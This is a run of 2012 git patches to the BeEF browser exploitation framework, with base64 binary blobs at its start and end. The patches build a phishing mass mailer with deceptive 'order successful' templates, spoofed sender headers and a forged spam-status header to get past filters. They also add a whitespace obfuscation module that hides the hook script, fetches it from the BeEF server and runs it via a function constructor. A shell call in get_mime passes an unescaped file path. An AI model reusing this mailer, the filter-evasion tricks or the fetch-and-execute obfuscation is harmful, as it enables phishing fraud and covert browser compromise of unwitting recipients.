z!j9i{|E5mt5Hnx&S$X*|GJ8bH9{-2gGx4XAa3<j_c-xy+ze0(+>T1;FrK7YUM;Oay
z8$`ji1jgGLuVb7fExD^hf>58O;TEHO);M8Qn1%9k^O03>K^Sp%31k-2-H8GQ`Qx@F
z3k6rJxxL*&_D8|llc*{wy_^6siM9kqrm5pOrIb_e+?OSATwM}`(xx@sQ^ah51@l{v
zS-wzMj5<n8?2Yu`3tq;hkFS>}6AsN^@vb|U;r%baMOjHjYw*$hL6Zp?XU_<^Sp8>z
z)QNzgCeWl0Qp^5S2qm9pX?b0}0HKJvJs+dy?u6kHVXdC@aCe10?c$cXfW1+%*!qeH
zZ~eYO!GjRw<At*PlGamc`M_Qy%ob4gEm0(QF9eq?)m_jSx-w}gNdRf9N>ImTxTqcA
z?&03*NwP(PeSMIho+nhm^>|;_!^z(RH!oSx+VD{*T1k|)YE~bEgE|(jX8b=<Vwj}m
zBiSIGQK`6-@*2U8XyFZWg$Es%hjvblW-blxSTG;crcG@1l)<29Y-}NA`h_T|k7}-G
zLYNbuD1k!)$i;~I(v*{~U!|)@d3pPJB@aGuFJ{fY2B^^q)o<OgJL(PW{CX@}JO}T+
z^K!dWva)iJRahvfSA9>k0elM~R`EATfjkKyJs_$lNFZ0NuB;lVsqIS%+}+*q&41s=
z;wAG1Tcom1$gOHH3S$t+1xyig0!39l+o$W`<e|lrPu!31zF7fH2LmmC`gsE?E|mB6
zoI(oOQ)dtA+(w<yCGV4DgY=4aF$uDW7W<lCH{nqp?QTthL4&aN=P$5&^#-i^aV?V4
z&mpIz9F3$Vk&2{HaT{jHAU{kRI~u>g_jXK}G`7PJ%RHZrAJ(oHq*32FsmKdOqH6<e
ztJjl60}vp)L38b#?0xsep1?crti+Q~wx6RyM)e(c+`{?XxlE*|pGQSSB_EmW?&b;)
zPj^H{MZndi>oI#z{q030C#Lr<GT%L$itG%UY*ZyJ3yG`&5K=vUVN&EFGQ?kg|6>F(
ziP17(*p`M23E|umDl9C*gOB_T>o@G=Ia+-nJxE&oopG|X93--q4PqghgPupOT(S-B
z`^z(U?X~yNP;Z@X_}_oO4zm~BhV|>V3mL)I4FHm7fkfU?2^<pjg#;l=WBfd*af741
zqLvx#&%N>v)^FL4Ki_v3=FgjjL4g51dc$++nb^H&A6EUe4*QNL3iTi^R&NS-jPZkv
zk4sBHqP_$O5w-pCWk&aFybj!C#?jc5IGUJ(uwZ|T9~q4i(UBNEDhgp?A#ihb<sK@%
zUe7r<w*bk>XOVP<aY`yqCZ`}L`-0%zqIu(5tJ@r3Gky}b(XL;js{kNG)Xk6bl3rtK
zkOnRq9w1ClIgj+D4E$)f1q!X2t#>=96biU$ouF&bqn4>+2BQhJG!LX&Cj<$phZd<*
zE-GsW1F7cXB?u#nC6cIL0YdaX1UKocY++C1X&+AF?$6eFW4#_#bwWdm(!w&ashnt2
zSo&YJG%>6T4g&9E5N3f(B++F72obfap&SzmvfT}##ePszo|GlNr|Q>+1f)vc2f<q<
zkwljjAVkzdiHd`M;oty9FrLDAqzD+le*AspsiJ!CP13EF$W{Q-q$ELTY@H=8P?94w
z`Sy0ke_=ehA0&qa4v8*_`g4XE0fsvNeE^}J{g*zL9QR1zkZ2$Qq$OpEl7xC{S-aSX
zx;EU2i%(jTNFtjB2oZIYdynyaEAI5vPKT<jwo12FqJa(&3ms*=1VV!Ya>JfO=Mz{v
zBN`h<$%Zs>H(t7}5)A|+y(dJe<$FXXFIN<Vfs{iThcl*p6=yWJv?c)MK`4EtA@;i<
h6*NiI2lW317yx`?p4YFDpECde002ovPDHLkV1n_xH5UK?

literal 0
HcmV?d00001

diff --git a/extensions/social_engineering/mass_mailer/templates/default/mail.html b/extensions/social_engineering/mass_mailer/templates/default/mail.html
new file mode 100644
index 000000000..5620d00c8
--- /dev/null
+++ b/extensions/social_engineering/mass_mailer/templates/default/mail.html
@@ -0,0 +1,19 @@
+<html>
+<head>
+<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
+</head>
+<body bgcolor="#FFFFFF" text="#000000">
+Hi __name __,<br>
+<br>
+We would like to inform you that your BeEF order has been successful.<br>
+You can check the status of your hook at the following link:<br>
+<!-- be sure to have __link__ and __linktext__ placeholders on the same line, like the following: -->
+<a href="__link__">__linktext__</a><br>
+<br>
+Regards,<br>
+The BeEF team<br>
+<!-- be sure to have different images on different lines, like the following: -->
+<img src="cid:__cid1__" name="__img1__" alt="__img1__"><br>
+<!--<img src="cid:__cid2__" name="__img2__" alt="__img2__"><br>-->
+</body>
+</html>
\ No newline at end of file
diff --git a/extensions/social_engineering/mass_mailer/templates/default/mail.plain b/extensions/social_engineering/mass_mailer/templates/default/mail.plain
new file mode 100644
index 000000000..4b57cf16d
--- /dev/null
+++ b/extensions/social_engineering/mass_mailer/templates/default/mail.plain
@@ -0,0 +1,8 @@
+Hi __name__,
+
+We would like to inform you that your BeEF order has been successful.
+You can check the status of your hook at the following link:
+__link__
+
+Regards,
+The BeEF team
\ No newline at end of file

From ffbd3d65b9b7338afd000dc2972f06c14625d1e7 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 27 Aug 2012 21:30:09 +0100
Subject: [PATCH 006/397] Social Eng. extension: various fixes,
 link/linktext/fromname configurable, adjusted various email headers

---
 extensions/social_engineering/config.yaml     |  2 +-
 .../mass_mailer/mass_mailer.rb                | 33 +++++++++++--------
 .../mass_mailer/templates/default/mail.html   |  6 ++--
 3 files changed, 24 insertions(+), 17 deletions(-)

diff --git a/extensions/social_engineering/config.yaml b/extensions/social_engineering/config.yaml
index d5b3444b2..ad4c5d529 100644
--- a/extensions/social_engineering/config.yaml
+++ b/extensions/social_engineering/config.yaml
@@ -28,7 +28,7 @@ beef:
                 port: 587
                 use_tls: true
                 helo: "gmail.com" # this is usually the domain name
-                from: "yourpass@gmail.com"
+                from: "yourmail@gmail.com"
                 password: "yourpass"
                 # available templates
                 templates:
diff --git a/extensions/social_engineering/mass_mailer/mass_mailer.rb b/extensions/social_engineering/mass_mailer/mass_mailer.rb
index 66a965f4f..0a25d4db9 100644
--- a/extensions/social_engineering/mass_mailer/mass_mailer.rb
+++ b/extensions/social_engineering/mass_mailer/mass_mailer.rb
@@ -37,7 +37,7 @@ module BeEF
         # tos_hash is an Hash like:
         # 'antisnatchor@gmail.com' => 'Michele'
         # 'ciccio@pasticcio.com' => 'Ciccio'
-        def send_email(template, subject, tos_hash)
+        def send_email(template, fromname, subject, link, linktext, tos_hash)
           # create new SSL context and disable CA chain validation
           if @config.get("#{@config_prefix}.use_tls")
             @ctx = OpenSSL::SSL::SSLContext.new
@@ -45,13 +45,19 @@ module BeEF
             @ctx.ssl_version = "TLSv1"
           end
 
+          n = tos_hash.size
+          x = 1
+          print_info "Sending #{n} mail(s) from [#{@from}] - name [#{fromname}] using template [#{template}]:\nsubject: #{subject}\nlink: #{link}\nlinktext: #{linktext}"
+
           # create a new SMTP object, enable TLS with the previous instantiated context, and connects to the server
           smtp = Net::SMTP.new(@host, @port)
           smtp.enable_starttls(@ctx) unless @config.get("#{@config_prefix}.use_tls") == false
           smtp.start(@helo, @from, @password, :login) do |smtp|
             tos_hash.each do |mail, name|
-            message = compose_email(mail, name, subject, template)
+            message = compose_email(fromname, mail, name, subject, link, linktext, template)
             smtp.send_message(message, @from, mail)
+            print_info "Mail #{x}/#{n} to [#{mail}] sent."
+            x += 1
             end
           end
         end
@@ -59,18 +65,15 @@ module BeEF
         #todo sending to hostmonster the email is probably flagged as spam:
         # todo: error -> 550 550 Administrative prohibition (state 17
 
-        def compose_email(to, name, subject, template)
+        def compose_email(fromname, to, name, subject, link, linktext, template)
            msg_id = random_string(50)
            boundary = "------------#{random_string(24)}"
            rel_boundary = "------------#{random_string(24)}"
 
-           link = "http://127.0.0.1:3000/demos/basic.html"
-           linktext = "http://antisnatchor.com"
-
-           header = email_headers(@from, @user_agent, to, name, subject, msg_id, boundary)
+           header = email_headers(@from, fromname, @user_agent, to, name, subject, msg_id, boundary)
            plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain"),boundary)
            rel_header = email_related(rel_boundary)
-           html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain"),rel_boundary)
+           html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html"),rel_boundary)
 
            images = ""
            @config.get("#{@config_prefix}.templates.default.images").each do |image|
@@ -84,12 +87,16 @@ module BeEF
            message
         end
 
-        def email_headers(from, user_agent, to, name, subject, msg_id, boundary)
+        #todo "Michele Orru" need to be configurable
+        def email_headers(from, fromname, user_agent, to, name, subject, msg_id, boundary)
           headers = <<EOF
-From: Michele Orru #{from}
-User-Agent: #{user_agent}
-To: #{name} #{to}
-Message-ID: <msg_id@#{@host}>
+From: "#{fromname}" <#{from}>
+Reply-To: "#{fromname}" <#{from}>
+Return-Path: "#{fromname}" <#{from}>
+X-Mailer: #{user_agent}
+To: #{to}
+Message-ID: <#{msg_id}@#{@host}>
+X-Spam-Status: No, score=0.001 required=5
 Subject: #{subject}
 MIME-Version: 1.0
 Content-Type: multipart/alternative;
diff --git a/extensions/social_engineering/mass_mailer/templates/default/mail.html b/extensions/social_engineering/mass_mailer/templates/default/mail.html
index 5620d00c8..195f9a116 100644
--- a/extensions/social_engineering/mass_mailer/templates/default/mail.html
+++ b/extensions/social_engineering/mass_mailer/templates/default/mail.html
@@ -3,17 +3,17 @@
 <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
 </head>
 <body bgcolor="#FFFFFF" text="#000000">
-Hi __name __,<br>
+Hi __name__,<br>
 <br>
 We would like to inform you that your BeEF order has been successful.<br>
 You can check the status of your hook at the following link:<br>
-<!-- be sure to have __link__ and __linktext__ placeholders on the same line, like the following: -->
+<!-- be sure to have link and linktext placeholders on the same line, like the following: -->
 <a href="__link__">__linktext__</a><br>
 <br>
 Regards,<br>
 The BeEF team<br>
 <!-- be sure to have different images on different lines, like the following: -->
 <img src="cid:__cid1__" name="__img1__" alt="__img1__"><br>
-<!--<img src="cid:__cid2__" name="__img2__" alt="__img2__"><br>-->
+<!--<img src="cid:cid2" name="img2" alt="img2"><br>-->
 </body>
 </html>
\ No newline at end of file

From 788cef08d3f18ab2bd2946219027e2a0f0cd57cc Mon Sep 17 00:00:00 2001
From: Jean-Louis Huynen <huynenjl@gmail.com>
Date: Wed, 29 Aug 2012 13:54:26 +0200
Subject: [PATCH 007/397] add whitespace obfuscation technique - should work in
 theory - but does not in practice

---
 extensions/evasion/obfuscation/whitespace.rb | 84 ++++++++++++++++++++
 1 file changed, 84 insertions(+)
 create mode 100644 extensions/evasion/obfuscation/whitespace.rb

diff --git a/extensions/evasion/obfuscation/whitespace.rb b/extensions/evasion/obfuscation/whitespace.rb
new file mode 100644
index 000000000..5f640651c
--- /dev/null
+++ b/extensions/evasion/obfuscation/whitespace.rb
@@ -0,0 +1,84 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Extension
+    module Evasion
+      class Whitespace
+        include Singleton
+
+        def need_bootstrap
+          false
+        end
+
+        def execute(input, config)
+          print_debug input.length
+          encoded = encode(input)
+	        var_name = BeEF::Extension::Evasion::Helper::random_string(3)
+
+          config = BeEF::Core::Configuration.instance
+          hook = config.get("beef.http.hook_file")
+          host = config.get("beef.http.host")
+          port = config.get("beef.http.port")
+          decode_function =
+"
+//Dirty IE6 whitespace bug hack
+#{var_name} = function (){
+  jQuery.get(\'http://#{host}:#{port}#{hook}\', function callback(data) {
+    var output = '';
+    var str = '//E'+'OH';
+    var chunks = data.split(str);
+    for (var i = 0; i < chunks.length; i++)
+    {
+      if(chunks[i].substring(0,4)  == '----')
+      {
+        input = chunks[i].split('\\n');
+        input = input[0].substring(5);
+        for(y = 0; y < input.length/8; y++)
+        {
+          v = 0;
+          for(x = 0; x < 8; x++)
+          {
+	          if(input.charCodeAt(x+(y*8)) > 9)
+	          {
+		          v++;
+	          }
+	          if(x != 7)
+	          {
+		          v = v << 1;
+	          }
+          }
+          output += String.fromCharCode(v);
+        }
+      }
+    }alert(output.length);[].constructor.constructor(output)();
+  }, 'text');
+}
+#{var_name}();//EOH-----"
+
+	        input = "#{decode_function}#{encoded}"
+          print_debug "[OBFUSCATION - WHITESPACE] Javascript has been Whitespace Encoded"
+          input
+        end
+
+        def encode(input)                 
+          output = input.unpack('B*') 
+          output = output.to_s.gsub(/[\["01\]]/, '[' => '', '"' => '', ']' => '',  '0' => "\t", '1' => ' ')
+          output
+        end
+      end
+    end
+  end
+end

From e86712413ca64d0c9f0a646ad1481320680153b9 Mon Sep 17 00:00:00 2001
From: Jean-Louis Huynen <huynenjl@gmail.com>
Date: Wed, 29 Aug 2012 18:22:22 +0200
Subject: [PATCH 008/397] modified whitespace evasion technique to keep it
 simple - modified beefjs (just one line, i don't had much time to investigate
 my change but it seems to work better with it than without it :)

---
 core/main/handlers/modules/beefjs.rb         |  3 +-
 extensions/evasion/config.yaml               |  5 +-
 extensions/evasion/extension.rb              |  1 +
 extensions/evasion/obfuscation/whitespace.rb | 76 ++++++++------------
 4 files changed, 35 insertions(+), 50 deletions(-)

diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb
index 8e30ae735..38e48f05c 100644
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -104,8 +104,7 @@ module BeEF
 
             if config.get("beef.extension.evasion.enable")
               evasion = BeEF::Extension::Evasion::Evasion.instance
-              @hook = evasion.add_bootstrapper + evasion.obfuscate(@hook)
-              @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate) + @hook
+              @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook) 
             else
               @final_hook = ext_js_to_not_obfuscate + @hook
             end
diff --git a/extensions/evasion/config.yaml b/extensions/evasion/config.yaml
index 712989a31..7d9db7f91 100644
--- a/extensions/evasion/config.yaml
+++ b/extensions/evasion/config.yaml
@@ -16,7 +16,7 @@
 beef:
     extension:
         evasion:
-            enable: true 
+            enable: true
             name: 'Evasion'
             authors: ["antisnatchor"]
             exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js"]
@@ -26,4 +26,5 @@ beef:
               beef: "beef"
               Beef: "Beef"
               evercookie: "evercookie"
-            chain: ["scramble", "minify"]
+            #chain: ["scramble", "minify"]
+            chain: ["minify", "base64", "whitespace"]
diff --git a/extensions/evasion/extension.rb b/extensions/evasion/extension.rb
index ce1fc360e..e7e5c25d5 100644
--- a/extensions/evasion/extension.rb
+++ b/extensions/evasion/extension.rb
@@ -30,3 +30,4 @@ require 'extensions/evasion/helper'
 require 'extensions/evasion/obfuscation/scramble'
 require 'extensions/evasion/obfuscation/minify'
 require 'extensions/evasion/obfuscation/base_64'
+require 'extensions/evasion/obfuscation/whitespace'
diff --git a/extensions/evasion/obfuscation/whitespace.rb b/extensions/evasion/obfuscation/whitespace.rb
index 5f640651c..8c20217f4 100644
--- a/extensions/evasion/obfuscation/whitespace.rb
+++ b/extensions/evasion/obfuscation/whitespace.rb
@@ -20,56 +20,40 @@ module BeEF
         include Singleton
 
         def need_bootstrap
-          false
+          true
+        end
+        
+        def get_bootstrap
+        # the decode function is in plain text - called IE-spacer - because trolling is always a good idea
+        decode_function =
+"//Dirty IE6 whitespace bug hack
+function IE_spacer(css_space) {
+  var spacer = '';
+  for(y = 0; y < css_space.length/8; y++)
+  {
+    v = 0;
+    for(x = 0; x < 8; x++)
+    {
+      if(css_space.charCodeAt(x+(y*8)) > 9)
+      {
+        v++;
+      }
+      if(x != 7)
+      {
+        v = v << 1;
+      }
+    }
+    spacer += String.fromCharCode(v);
+  }return spacer;
+}"
         end
 
         def execute(input, config)
-          print_debug input.length
+          size = input.length
           encoded = encode(input)
-	        var_name = BeEF::Extension::Evasion::Helper::random_string(3)
-
-          config = BeEF::Core::Configuration.instance
-          hook = config.get("beef.http.hook_file")
-          host = config.get("beef.http.host")
-          port = config.get("beef.http.port")
-          decode_function =
-"
-//Dirty IE6 whitespace bug hack
-#{var_name} = function (){
-  jQuery.get(\'http://#{host}:#{port}#{hook}\', function callback(data) {
-    var output = '';
-    var str = '//E'+'OH';
-    var chunks = data.split(str);
-    for (var i = 0; i < chunks.length; i++)
-    {
-      if(chunks[i].substring(0,4)  == '----')
-      {
-        input = chunks[i].split('\\n');
-        input = input[0].substring(5);
-        for(y = 0; y < input.length/8; y++)
-        {
-          v = 0;
-          for(x = 0; x < 8; x++)
-          {
-	          if(input.charCodeAt(x+(y*8)) > 9)
-	          {
-		          v++;
-	          }
-	          if(x != 7)
-	          {
-		          v = v << 1;
-	          }
-          }
-          output += String.fromCharCode(v);
-        }
-      }
-    }alert(output.length);[].constructor.constructor(output)();
-  }, 'text');
-}
-#{var_name}();//EOH-----"
-
-	        input = "#{decode_function}#{encoded}"
-          print_debug "[OBFUSCATION - WHITESPACE] Javascript has been Whitespace Encoded"
+          var_name = BeEF::Extension::Evasion::Helper::random_string(3)
+          input = "var #{var_name}=\"#{encoded}\";[].constructor.constructor(IE_spacer(#{var_name}))();"
+          print_debug "[OBFUSCATION - WHITESPACE] #{size}byte of Javascript code has been Whitespaced"
           input
         end
 

From 92b2382e2552fede1df1051c0e0b94822bdc676e Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 29 Aug 2012 17:38:37 +0100
Subject: [PATCH 009/397] Social Eng. extension: added support to specify
 attachments, added automatic MIME type guessing

---
 .../mass_mailer/mass_mailer.rb                |  46 +++++++++++++-----
 .../templates/default/beef_attachment.pdf     | Bin 0 -> 33184 bytes
 .../mass_mailer/templates/default/mail.html   |   2 +
 .../mass_mailer/templates/default/mail.plain  |   2 +
 4 files changed, 39 insertions(+), 11 deletions(-)
 create mode 100644 extensions/social_engineering/mass_mailer/templates/default/beef_attachment.pdf

diff --git a/extensions/social_engineering/mass_mailer/mass_mailer.rb b/extensions/social_engineering/mass_mailer/mass_mailer.rb
index 0a25d4db9..ae0feb901 100644
--- a/extensions/social_engineering/mass_mailer/mass_mailer.rb
+++ b/extensions/social_engineering/mass_mailer/mass_mailer.rb
@@ -47,7 +47,10 @@ module BeEF
 
           n = tos_hash.size
           x = 1
-          print_info "Sending #{n} mail(s) from [#{@from}] - name [#{fromname}] using template [#{template}]:\nsubject: #{subject}\nlink: #{link}\nlinktext: #{linktext}"
+          print_info "Sending #{n} mail(s) from [#{@from}] - name [#{fromname}] using template [#{template}]:"
+          print_info "subject: #{subject}"
+          print_info "link: #{link}"
+          print_info "linktext: #{linktext}"
 
           # create a new SMTP object, enable TLS with the previous instantiated context, and connects to the server
           smtp = Net::SMTP.new(@host, @port)
@@ -62,15 +65,12 @@ module BeEF
           end
         end
 
-        #todo sending to hostmonster the email is probably flagged as spam:
-        # todo: error -> 550 550 Administrative prohibition (state 17
-
         def compose_email(fromname, to, name, subject, link, linktext, template)
            msg_id = random_string(50)
            boundary = "------------#{random_string(24)}"
            rel_boundary = "------------#{random_string(24)}"
 
-           header = email_headers(@from, fromname, @user_agent, to, name, subject, msg_id, boundary)
+           header = email_headers(@from, fromname, @user_agent, to, subject, msg_id, boundary)
            plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain"),boundary)
            rel_header = email_related(rel_boundary)
            html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html"),rel_boundary)
@@ -80,15 +80,19 @@ module BeEF
              images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
            end
 
+           attachments = ""
+           @config.get("#{@config_prefix}.templates.default.attachments").each do |attachment|
+             attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
+           end
+
            close = email_close(boundary)
 
-           message = header + plain_body + rel_header + html_body + images + close
+           message = header + plain_body + rel_header + html_body + images + attachments + close
            print_debug "Raw Email content:\n #{message}"
            message
         end
 
-        #todo "Michele Orru" need to be configurable
-        def email_headers(from, fromname, user_agent, to, name, subject, msg_id, boundary)
+        def email_headers(from, fromname, user_agent, to, subject, msg_id, boundary)
           headers = <<EOF
 From: "#{fromname}" <#{from}>
 Reply-To: "#{fromname}" <#{from}>
@@ -144,15 +148,29 @@ EOF
 
         def email_add_image(name, path, rel_boundary)
           file_encoded = [File.read(path)].pack("m") # base64 encoded
-          #todo: content-type must be determined at least from file extension, not hardcoded
           image = <<EOF
-Content-Type: image/png;
+Content-Type: #{get_mime(path)};
  name="#{name}"
 Content-Transfer-Encoding: base64
 Content-ID: <#{name}>
 Content-Disposition: inline;
  filename="#{name}"
 
+#{file_encoded}
+--#{rel_boundary}
+EOF
+          image
+        end
+
+        def email_add_attachment(name, path, rel_boundary)
+          file_encoded = [File.read(path)].pack("m") # base64 encoded
+          image = <<EOF
+Content-Type: #{get_mime(path)};
+ name="#{name}"
+Content-Transfer-Encoding: base64
+Content-Disposition: attachment;
+ filename="#{name}"
+
 #{file_encoded}
 --#{rel_boundary}
 EOF
@@ -191,9 +209,15 @@ EOF
           result
         end
 
+        def get_mime(file_path)
+          mime = "file --mime -b #{file_path}"
+          result = ""
+          IO.popen(mime.to_s) { |f| result = f.gets.split(";").first }
+          result
+        end
+
         def random_string(length)
            output = (0..length).map{ rand(36).to_s(36).upcase }.join
-           output
         end
       end
     end
diff --git a/extensions/social_engineering/mass_mailer/templates/default/beef_attachment.pdf b/extensions/social_engineering/mass_mailer/templates/default/beef_attachment.pdf
new file mode 100644
index 0000000000000000000000000000000000000000..c6e3880b49bbb4e555263a2c486ed05c6a330929
GIT binary patch
literal 33184
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
